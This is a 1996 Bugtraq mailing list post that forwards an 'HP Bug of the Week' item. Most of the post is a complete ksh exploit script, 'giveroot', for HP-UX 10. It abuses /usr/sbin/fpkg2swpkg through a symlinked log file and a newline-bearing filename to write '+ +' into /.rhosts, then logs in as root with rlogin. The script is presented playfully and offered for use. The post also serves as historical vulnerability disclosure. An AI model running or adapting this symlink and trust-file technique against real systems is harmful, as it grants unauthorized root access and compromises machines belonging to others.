Bugtraq mailing list archives

HP Bug of the Week: OFS

From: aleph1 () dfw net (Aleph One)
Date: Sat, 23 Nov 1996 08:24:00 -0600

From our wacked out, and most of the time high, friends at SOD comes:

Other Folks Scripts

   For this new addition to the HP Bug of the Week page, we're adding
   scripts that were sent to SOD by other Scriptors out there in Netland.
   We're starting off with a buggeridoo from a Scriptor named the Dog
   Catcher who'd like to show us all a bug in version 10's
   /usr/sbin/fpkg2swpkg. We would like to thank Dog Catcher for all his
   efforts. He has been given the SOD Honorary Homeboy status which
   grants him free access to the SOD Corporate Headquarters, an "I
   (heart) HP" baseball cap, and a vial of amyl nitrate. Party on, DC!

#!/bin/ksh
# giveroot Version 1.1 (C) 1996 Dog Catcher
# gives you root by poking + + into /.rhosts
# this version even works on mode 600 /.rhosts
# tested on HP/UX 10.01

# setup stuff
FILE=/tmp/fpkg2swpk
LOG=/tmp/fpkg2swpkg.log
DUMMY=/tmp/"`echo '\n+ +'`"
SUCKER=/usr/sbin/fpkg2swpkg
RHOSTS=/.rhosts

# naughty bits
touch ${FILE}
rm -f ${LOG}
ln -s ${RHOSTS} ${LOG}
ln -s ${SUCKER} "${DUMMY}"
"${DUMMY}" ${FILE}

# tidy up
rm -f ${FILE} "${DUMMY}" ${LOG}

# i wanna hash prompt
rlogin `uname -n` -l root

Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01